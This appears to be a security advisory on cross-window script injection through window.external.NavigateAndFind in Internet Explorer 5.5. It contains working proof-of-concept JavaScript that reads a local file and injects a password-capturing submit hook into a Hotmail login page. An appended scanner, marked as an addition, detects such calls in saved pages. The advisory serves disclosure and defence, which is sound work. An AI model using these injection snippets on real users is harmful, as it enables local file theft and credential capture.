COMMAND
window.external.NavigateAndFind
SYSTEMS AFFECTED
IE5.5
PROBLEM
Alp Sinan found the following. There are multiple security
vulnerabilities in the window.external.NavigateAndFind function
in IE5.5. The vulnerabilities seem to persist after the most
recent patches are applied. The issue is not currently discussed
on the Microsoft website. Microsoft has been notified about the
problem via email. So far there has been no response.
Vulnerability 1: The window.external.NavigateAndFind function can
access local files, provided that the local file's name and path
are known. The code:
    <A href="javascript:LinkClicked()">Show local file's Content</A>
    <SCRIPT>
    function LinkClicked()
    {
        // Open the local file in a window named "local".
        b=window.open("file://C:/test.txt","local");
        setTimeout('Sniff()',1000);
    }
    function Sniff(){
        // The script URL runs in the window named "local".
        window.external.NavigateAndFind("javascript:alert(document.body.innerText);","b","local");
    }
    </SCRIPT>
Demonstration:
http://www.horoznet.com/AlpSinan/navAL.htm
Vulnerability 2: The window.external.NavigateAndFind function can
access another window's DOM. The opened window's content can be
edited, so code injection is possible. The code:
    <A href="javascript:LinkClicked()">Go to Hotmail </A>
    <SCRIPT>
    function LinkClicked()
    {
        // Open the login page in a window named "new".
        a=window.open("http://lc2.law5.hotmail.passport.com/cgi-bin/login","new");
        setTimeout('Spoof()',20000);// you may modify the timeout....
    }
    function Spoof(){
        // The script URL runs in the window named "new" and rewrites its content.
        window.external.NavigateAndFind("javascript:document.write(''+document.body.outerHTML+'<scrIpt>document.passwordform.onsubmit=ShowPass;function ShowPass(){alert(\"Your Password is: \n \"+document.passwordform.passwd.value)};window.focus();</sc'+'rIpt>');alert('The code has been injected right now.');","a","new");
    }
    </SCRIPT>
Demonstration:
http://www.horoznet.com/AlpSinan/navCI.htm
Vulnerability 3: IE5.5 can execute the JavaScript or VBScript
content of plain text files. Demonstration:
http://www.horoznet.com/AlpSinan/execlocal.htm
SOLUTION
Possible precautions or workarounds are disabling JavaScript or
using caution when clicking links in untrusted web pages as well
as popup windows.
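For reviewing saved pages or proxy captures, the following added example (not part of the original advisory) scans page source for NavigateAndFind calls and flags those whose first argument is a javascript: or vbscript: URL, as in Vulnerabilities 1 and 2. The function names, verdict labels and sample page are assumptions made for illustration; the third argument is treated as the target window name, as in the code above.

```javascript
// Added example (not from the advisory): static check for the call pattern
// both demonstrations use, a script URL passed to NavigateAndFind.
const SCRIPT_SCHEME = /^\s*(javascript|vbscript):/i;
// Collect the string-literal arguments of a call; `pos` is just past "(".
// Handles both quote styles and backslash escapes, stops at the closing ")".
function readStringArgs(src, pos) {
  const args = [];
  let i = pos;
  while (i < src.length && src[i] !== ")") {
    const q = src[i];
    if (q === '"' || q === "'") {
      let value = "";
      i++;
      while (i < src.length && src[i] !== q) {
        if (src[i] === "\\" && i + 1 < src.length) i++; // keep the escaped character
        value += src[i++];
      }
      args.push(value);
    }
    i++;
  }
  return args;
}

function findNavigateAndFindCalls(html) {
  const findings = [];
  const call = /NavigateAndFind\s*\(/gi;
  let m;
  while ((m = call.exec(html)) !== null) {
    const start = call.lastIndex;
    const line = html.slice(0, m.index).split("\n").length;
    // A URL that is not a string literal cannot be judged statically.
    const literal = /^\s*["']/.test(html.slice(start));
    const args = literal ? readStringArgs(html, start) : [];
    const verdict = !literal ? "review"
      : SCRIPT_SCHEME.test(args[0]) ? "script-url" : "ok";
    findings.push({ line, verdict, target: args[2] || null });
  }
  return findings;
}

// Constructed sample page: one call per verdict.
const SAMPLE = `<script>
window.external.NavigateAndFind("http://example.com/", "term", "main");
window.external.NavigateAndFind('JavaScript:void(0);', "x", 'local');
window.external.NavigateAndFind(nextUrl, 'x', 'main');
</script>`;
console.log(findNavigateAndFindCalls(SAMPLE));
```

A "review" verdict means the URL is built at run time and needs manual inspection; the check reads literal arguments only.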